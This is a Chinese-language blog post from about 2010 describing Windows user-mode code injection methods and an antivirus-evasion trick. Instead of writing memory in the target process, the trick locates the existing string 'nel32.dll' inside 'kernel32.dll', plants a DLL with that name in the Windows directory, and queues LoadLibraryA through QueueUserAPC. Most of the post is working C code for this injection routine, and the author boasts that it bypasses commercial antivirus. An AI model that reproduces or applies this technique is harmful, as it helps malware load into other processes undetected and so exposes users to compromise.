注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

BCB-DG's Blog

...

 
 
 

日志

 
 

代码注入方法  

2010-11-30 14:44:07|  分类: Delphi |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

//by:shineastdh
目前大多数的杀软都是hook NtWriteVirtualMemory和NtUserSetWindowsHookAW、NtUserSetWindowsHookE来防止代码注入。
关于代码注入Ring3层的方法主要有:
l远程线程CreateRemoteThread
l消息钩子SetWindowsHookEx
lRing3 APC QueueUserApc
l修改线程上下文SetContextThread
其中第一种和第三种方法需要传入一个param,但是要求这个param必须在目标进程内存空间,之前的一些方法比较笨重,直接在目标进程 VirtualAllocEx内存,然后把希望的参数内容写入这个内存,使用了WriteProcessMemory函数,而这个函数是被hook的,所以杀软可以很容易的拦截代码注入行为。
仔细想想,杀软的这种防御是很失败的!原因是为了要一个param,攻击者完全没有必要做这么大的动作去目标进程内存空间申请内存并写内存,我在思考是否可以不用WriteProcessMemory函数呢?反正我的目的就是得到一个合理的 param,并且这个param是在目标进程内存空间即可!
思考后,原来一切是这么容易啊,哈哈!乐了我半天~~~
举个例子:假设我是这样注入的:
QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;
我想让上面的param的内容是一个“xxx.dll”,就可以了,而且要求这个param是在目标进程内存空间
您想到了么?哈哈
答案:直接在目标进程搜索一个这样的字符串“nel32.dll”就可以啦!因为“kernel32.dll” 这样的字符串是一定存在的,那么为了和“kernel32.dll” 不一样,那就随便使用一下“nel32.dll”,或者“el32.dll”,都是可以的啊!最后在往windows目录下面撂进入一个 nel32.dll,这样注入大部分杀软都是不能拦截到的!哈哈!
写了段程序,做了个试验,仅测试了下趋势,完美绕过!其实杀软稍后测试。。。
DWORD EnumThreadandInjectDll(char *processName,HANDLE hProcess, DWORD dwProcessID,TIDLIST *pThreadIdList)
{
TIDLIST *pCurrentTid = pThreadIdList ;
const char szInjectModName[] = "nel32.dll";
DWORD dwLen = strlen(szInjectModName) ;
//不写目标进程的内存
//直接在目标进程中搜索出 nel32.dll 这样的字符串 并注入
int bufflen=30000;
char *buffer=(char *)malloc(sizeof(char)*bufflen);
DWORD dwNumberOfBytesRead;
DWORD defaultAddress;
//获得该进程的基址
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID) ;
if(!hSnapshot)
{
   printf("CreateToolhelp32Snapshot error!\n");
   return 0;
}
MODULEENTRY32 me = { sizeof(me) };
BOOL fOk =Module32First(hSnapshot,&me);
if(!fOk)
{
   printf("Module32First error!\n");
   return 0;
}
for (; fOk; fOk = Module32Next(hSnapshot,&me))
{
  printf("%s process module name = %s\n",processName,me.szModule);
  // 取得进程模块基址
  if(stricmp(me.szModule,processName)==0)
  {
    defaultAddress=(DWORD)me.modBaseAddr;
    printf("%s process module base = 0x%08X\n",processName,defaultAddress);
    break;
  }
}
//搜索
if(!ReadProcessMemory(hProcess,(LPCVOID)defaultAddress,buffer,bufflen,&dwNumberOfBytesRead))
{
  printf("ReadProcessMemory error!\n");
  return 0;
}

for(int i=0;i<bufflen-dwLen;i++)
{
   if(strnicmp(buffer+i,szInjectModName,dwLen)==0)
   {
    printf("found nel32.dll already!... %s\n",buffer+i);
    while (pCurrentTid)
    {
     HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pCurrentTid->dwTid) ;
     if (hThread != NULL)
     {
      // 注入DLL到指定进程
      QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)(defaultAddress+i)) ;
     }
     printf("TID:%d\n", pCurrentTid->dwTid) ;
     pCurrentTid = pCurrentTid->pNext ;
    }
    break;
   }
}
return 0 ;
}

  评论这张
 
阅读(1431)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017